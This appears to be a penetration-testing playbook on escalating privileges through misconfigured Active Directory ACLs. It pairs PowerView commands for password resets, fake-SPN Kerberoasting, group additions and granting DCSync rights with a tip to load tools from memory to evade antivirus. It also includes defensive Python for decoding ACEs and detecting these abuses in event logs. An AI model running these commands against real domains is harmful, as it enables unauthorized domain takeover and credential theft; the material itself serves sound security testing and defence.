🛡️ Methodology Checklist
- Run BloodHound → review all ACL paths from owned principals
- Identify: GenericAll, GenericWrite, WriteDACL, WriteOwner, ForceChangePassword
- GenericAll on user: reset password or targeted Kerberoasting
- GenericWrite on user: set SPN → Kerberoast
- WriteDACL: grant self DCSync rights → run DCSync
- WriteOwner: take ownership → grant self full control
- ForceChangePassword: Set-DomainUserPassword (no current password needed)
- Document the full ACL chain for the report
🎯 Operational Context
Use when: BloodHound identifies ACL edges (WriteDACL, GenericAll, GenericWrite, ForceChangePassword, WriteOwner) on target objects.
Think Dumber First: BloodHound shortest paths to DA almost always include at least one ACL edge. Identify the ACL → understand what right it grants → abuse it. WriteDACL = grant yourself any right. GenericAll = all rights on the object.
Skip when: no BloodHound data → enumerate ACLs manually with PowerView first.
⚡ Tactical Cheatsheet
| Command | Tactical Outcome |
|---|---|
| Find-InterestingDomainAcl -ResolveGUIDs | PowerView → scan domain for exploitable ACL misconfigurations |
| Get-DomainObjectAcl -Identity [USER] -ResolveGUIDs | PowerView → get ACEs for a specific object |
| Set-DomainUserPassword -Identity [USER] -AccountPassword (ConvertTo-SecureString '[NEWPASS]' -AsPlainText -Force) | Abuse ForceChangePassword → reset target user's password |
| Set-DomainObject -Identity [USER] -Set @{serviceprincipalname='fake/spn'} | Abuse GenericWrite → assign fake SPN for targeted Kerberoasting |
| Add-DomainGroupMember -Identity '[GROUP]' -Members '[USER]' | Abuse AddSelf/AddMembers → add user to a group |
| Get-DomainGroupMember -Identity '[GROUP]' | Verify group membership after adding |
| Remove-DomainGroupMember -Identity '[GROUP]' -Members '[USER]' | Revert group membership change |
| Set-DomainObject -Identity [USER] -Clear serviceprincipalname | Remove fake SPN assigned during GenericWrite abuse |
🔬 Deep Dive & Workflow
ACL Overview
Access Control Lists (ACLs) define which principals have access to AD objects and what they can do. Key distinctions:
- DACL (Discretionary ACL): grants or denies access
- SACL (System ACL): generates audit logs
- ACE: a single entry within an ACL (principal SID + rule type + access mask)
Null DACL rule: an object with no DACL at all grants full access to everyone, whereas an empty DACL (present but containing no ACEs) denies access to everyone.
Vulnerability scanners cannot detect ACL misconfigurations: manual enumeration or BloodHound is required.
Finding Exploitable ACLs
```powershell
Import-Module .\PowerView.ps1
# -ResolveGUIDs turns the rights/attribute GUIDs in each ACE into readable names
Find-InterestingDomainAcl -ResolveGUIDs
```
This resolves GUIDs to human-readable right names. Focus on ACEs where your compromised user (or the groups it is in) has non-standard rights over high-value targets.
BloodHound query: Outbound Control Rights on any user node → shows all objects the user can control and how.
Exploitable ACE Types
| Right | Target | Exploitation |
|---|---|---|
| ForceChangePassword | User | Reset password without knowing the current one |
| GenericWrite | User | Assign fake SPN → targeted Kerberoast |
| GenericWrite | Group | Add users to group |
| GenericAll | User/Computer | Full control → Kerberoast, reset password, or LAPS read |
| AddSelf | Group | Add yourself to the group |
| AddMembers | Group | Add any user to the group |
| WriteDACL | Object | Write new ACEs → grant yourself DCSync rights |
| ReadGMSAPassword | gMSA | Extract Group Managed Service Account password |
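To make the table concrete, here is an added Python example (not PowerView or BloodHound code) that decodes the two raw fields of an ACE, the access mask and the scoping GUID, into the right names used above; this is the work -ResolveGUIDs does for you, and it also shows why DCSync only exists once two separate replication rights line up for the same principal. The bit values and GUIDs are the schema-defined ones; the domain-head DACL at the end is constructed.

```python
from dataclasses import dataclass
# ActiveDirectoryRights bit values (System.DirectoryServices) as stored in an ACE's access mask
GENERIC_ALL, GENERIC_WRITE, WRITE_DACL, WRITE_OWNER = 0xF01FF, 0x20028, 0x40000, 0x80000
EXTENDED_RIGHT, WRITE_PROPERTY, SELF = 0x100, 0x20, 0x8
# Schema-defined GUIDs that scope an ACE to one right or attribute (what -ResolveGUIDs turns into names)
NULL_GUID = "00000000-0000-0000-0000-000000000000"              # unscoped: applies to the whole object
FORCE_CHANGE_PASSWORD = "00299570-246d-11d0-a768-00aa006e0529"  # User-Force-Change-Password
GET_CHANGES = "1131f6aa-9c07-11d1-f79f-00c04fc2dcd2"            # DS-Replication-Get-Changes
GET_CHANGES_ALL = "1131f6ad-9c07-11d1-f79f-00c04fc2dcd2"        # DS-Replication-Get-Changes-All
MEMBER_ATTR = "bf9679c0-0de6-11d0-a285-00aa003049e2"            # the group 'member' attribute

@dataclass
class Ace:
    principal: str
    mask: int
    object_type: str = NULL_GUID   # GUID the ACE is scoped to (the ObjectType field)
    allow: bool = True

def decode_ace(ace, target_class):
    """Right names (as in the table above) one ACE grants on a 'user', 'group' or 'domain' object."""
    if not ace.allow:                    # deny ACEs grant nothing (ACE ordering is ignored here)
        return set()
    m, g, rights = ace.mask, ace.object_type.lower(), set()
    if g == NULL_GUID and (m & GENERIC_ALL) == GENERIC_ALL:
        return {"GenericAll"}            # subsumes every right below
    rights |= {n for bit, n in ((WRITE_DACL, "WriteDACL"), (WRITE_OWNER, "WriteOwner")) if m & bit}
    if g == NULL_GUID and (m & GENERIC_WRITE) == GENERIC_WRITE:
        rights.add("GenericWrite")
    if m & EXTENDED_RIGHT:               # control-access right: the GUID says which one
        if target_class == "user" and g in (NULL_GUID, FORCE_CHANGE_PASSWORD):
            rights.add("ForceChangePassword")
        for guid, n in ((GET_CHANGES, "GetChanges"), (GET_CHANGES_ALL, "GetChangesAll")):
            if target_class == "domain" and g in (NULL_GUID, guid):
                rights.add(n)
    if target_class == "group" and g in (NULL_GUID, MEMBER_ATTR):   # writes to the member attribute
        rights |= {n for bit, n in ((WRITE_PROPERTY, "AddMembers"), (SELF, "AddSelf")) if m & bit}
    return rights

def dcsync_principals(domain_dacl):
    """DCSync needs BOTH replication rights on the domain head; they may sit in separate ACEs."""
    per_principal = {}
    for ace in domain_dacl:
        per_principal.setdefault(ace.principal, set()).update(decode_ace(ace, "domain"))
    return {p for p, r in per_principal.items() if "GenericAll" in r or {"GetChanges", "GetChangesAll"} <= r}
# Constructed DACL of the domain head, mirroring the WriteDACL → DCSync workflow below
SAMPLE_DOMAIN_DACL = [
    Ace("CORP\\Domain Admins", GENERIC_ALL),
    Ace("CORP\\wley", EXTENDED_RIGHT, GET_CHANGES), Ace("CORP\\wley", EXTENDED_RIGHT, GET_CHANGES_ALL),
    Ace("CORP\\svc_backup", EXTENDED_RIGHT, GET_CHANGES),   # only half of the pair: not DCSync
]
```

When auditing, run the same decoding over every ACE on Tier 0 objects and treat any principal outside the expected admin set that decodes to a non-empty result as a finding.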
Attack Workflows
ForceChangePassword:
```powershell
# Reset the target's password; the current password is not needed
$NewPass = ConvertTo-SecureString 'NewP@ssw0rd123!' -AsPlainText -Force
Set-DomainUserPassword -Identity wley -AccountPassword $NewPass
```
GenericWrite → Targeted Kerberoasting:
```powershell
# Assign fake SPN
Set-DomainObject -Identity damundsen -Set @{serviceprincipalname='notahacker/LEGIT'}
# Now Kerberoast that account
Get-DomainUser -Identity damundsen | Get-DomainSPNTicket -Format Hashcat
# Clean up
Set-DomainObject -Identity damundsen -Clear serviceprincipalname
```
AddSelf/AddMembers → Group Escalation:
```powershell
Add-DomainGroupMember -Identity 'Help Desk Level 1' -Members wley
Get-DomainGroupMember -Identity 'Help Desk Level 1' # verify
# ... abuse the access ...
Remove-DomainGroupMember -Identity 'Help Desk Level 1' -Members wley # revert
```
WriteDACL → DCSync:
```powershell
# Grant yourself DCSync rights over the domain object
Add-DomainObjectAcl -TargetIdentity "DC=INLANEFREIGHT,DC=LOCAL" -PrincipalIdentity wley -Rights DCSync
```
Then use secretsdump.py or Mimikatz DCSync as the modified user.
Operational Notes
- These are destructive operations: they modify the live AD environment
- Document every change: what was modified, when, the original value
- Revert all changes immediately after demonstrating impact
- Always consult the client before executing password resets or group membership changes in production
🛠️ Troubleshooting & Edge Cases
| Problem | Cause | Fix |
|---|---|---|
| PowerView Set-DomainObjectAcl fails | Execution policy or AV | Load via IEX; run from memory; ensure targeting correct object DN |
| ForceChangePassword blocked by GPO | Fine-grained password policy | Policy applies to target account; still works but new password must meet PSO requirements |
| GenericWrite on user but no shell | Targeted Kerberoasting | Add fake SPN: Set-DomainObject [USER] -Set @{serviceprincipalname='fake/FQDN'}; Kerberoast the SPN |
| WriteDACL applied but no effect | Replication delay on DC | Wait 60 seconds for AD replication; re-check with Get-DomainObjectAcl |
| BloodHound shows ACL but PowerView can't confirm | Different data collection time | Re-run SharpHound collection; ACLs change; stale BloodHound data misleads |
Reporting Trigger
Finding Title: Active Directory ACL Misconfiguration Enables Privilege Escalation
Impact: Misconfigured ACLs (GenericAll, WriteDACL, ForceChangePassword) on AD objects allow a low-privileged user to escalate to Domain Admin without exploiting any software vulnerability, purely through legitimate AD operations.
Root Cause: Excessive AD object permissions accumulated through IT operations without periodic ACL review. No monitoring on ACL modification or sensitive object permission grants.
Recommendation: Conduct an AD ACL audit using BloodHound or Purple Knight. Remove excessive permissions on sensitive objects (Domain Admins, krbtgt, GPOs). Implement an AD tiering model. Alert on ACL modifications to Tier 0 objects via Microsoft Defender for Identity.
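The "alert on ACL modifications" recommendation worked through, as an added example that is neither this page's tooling nor a Defender for Identity rule: each workflow above leaves a distinct Windows Security event, and this Python triage maps those events back to the abuse that produced them. The events are hand-constructed dicts carrying only the relevant 5136/4724/4728/4662 fields; the Tier 0 DN list, the password-reset allowlist and the sensitive-group set are assumptions a defender would maintain.

```python
# Constructed example: hand-written event dicts with the relevant 5136/4724/4728/4662 fields.
TIER0_DNS = {                                       # assumed defender-maintained Tier 0 list
    "DC=INLANEFREIGHT,DC=LOCAL",
    "CN=Domain Admins,CN=Users,DC=INLANEFREIGHT,DC=LOCAL",
    "CN=krbtgt,CN=Users,DC=INLANEFREIGHT,DC=LOCAL",
    "CN=AdminSDHolder,CN=System,DC=INLANEFREIGHT,DC=LOCAL",
}
SENSITIVE_GROUPS = {"Domain Admins", "Enterprise Admins", "Administrators", "Help Desk Level 1"}  # assumed
RESET_ALLOWLIST = {"helpdesk_svc"}                  # assumed: accounts expected to reset others' passwords
DCSYNC_GUIDS = {"1131f6aa-9c07-11d1-f79f-00c04fc2dcd2", "1131f6ad-9c07-11d1-f79f-00c04fc2dcd2"}

def classify(ev):
    """Return an alert string for one event, or None if it matches none of the abuse signatures."""
    eid, subj = ev["EventID"], ev.get("SubjectUserName", "")
    attr = ev.get("AttributeLDAPDisplayName")
    if eid == 5136 and attr == "nTSecurityDescriptor" and ev.get("ObjectDN") in TIER0_DNS:
        return f"WriteDACL: {subj} rewrote the DACL of {ev['ObjectDN']}"
    if eid == 5136 and attr == "servicePrincipalName" and ev.get("ObjectClass") == "user":
        return f"GenericWrite: {subj} set SPN {ev.get('AttributeValue')} on {ev['ObjectDN']} (targeted Kerberoast)"
    if eid == 4724 and subj not in RESET_ALLOWLIST:
        return f"ForceChangePassword: {subj} reset the password of {ev.get('TargetUserName')}"
    if eid in (4728, 4732, 4756) and ev.get("TargetUserName") in SENSITIVE_GROUPS:
        return f"AddMembers: {subj} added {ev.get('MemberName')} to {ev['TargetUserName']}"
    # 4662 carrying a replication GUID is DCSync; DC machine accounts (name ends in $) replicate legitimately
    if eid == 4662 and DCSYNC_GUIDS & set(ev.get("Properties", [])) and not subj.endswith("$"):
        return f"DCSync: {subj} requested directory replication of {ev.get('ObjectName')}"
    return None

def triage(events):
    """Run classify over a batch of events and keep only the hits, in order."""
    return [a for a in map(classify, events) if a]

# One event per workflow above plus two benign ones that must not fire (all constructed)
SAMPLE_EVENTS = [
    {"EventID": 5136, "SubjectUserName": "wley", "ObjectDN": "DC=INLANEFREIGHT,DC=LOCAL",
     "AttributeLDAPDisplayName": "nTSecurityDescriptor", "OperationType": "%%14674"},
    {"EventID": 5136, "SubjectUserName": "wley", "ObjectClass": "user", "AttributeValue": "notahacker/LEGIT",
     "ObjectDN": "CN=damundsen,CN=Users,DC=INLANEFREIGHT,DC=LOCAL", "AttributeLDAPDisplayName": "servicePrincipalName"},
    {"EventID": 4724, "SubjectUserName": "wley", "TargetUserName": "damundsen"},
    {"EventID": 4724, "SubjectUserName": "helpdesk_svc", "TargetUserName": "jdoe"},   # benign
    {"EventID": 4728, "SubjectUserName": "wley", "TargetUserName": "Help Desk Level 1",
     "MemberName": "CN=wley,CN=Users,DC=INLANEFREIGHT,DC=LOCAL"},
    {"EventID": 4662, "SubjectUserName": "wley", "ObjectName": "DC=INLANEFREIGHT,DC=LOCAL",
     "Properties": ["1131f6aa-9c07-11d1-f79f-00c04fc2dcd2"]},
    {"EventID": 4662, "SubjectUserName": "DC01$", "ObjectName": "DC=INLANEFREIGHT,DC=LOCAL",
     "Properties": ["1131f6ad-9c07-11d1-f79f-00c04fc2dcd2"]},                         # benign
]
```

Event 5136 is only written when Directory Service Changes auditing is enabled and the object carries a matching SACL, so the Tier 0 objects need that SACL before this detection can fire; the trailing-$ exclusion for 4662 is a convenience, and in production the subject should be compared against the actual domain controller accounts.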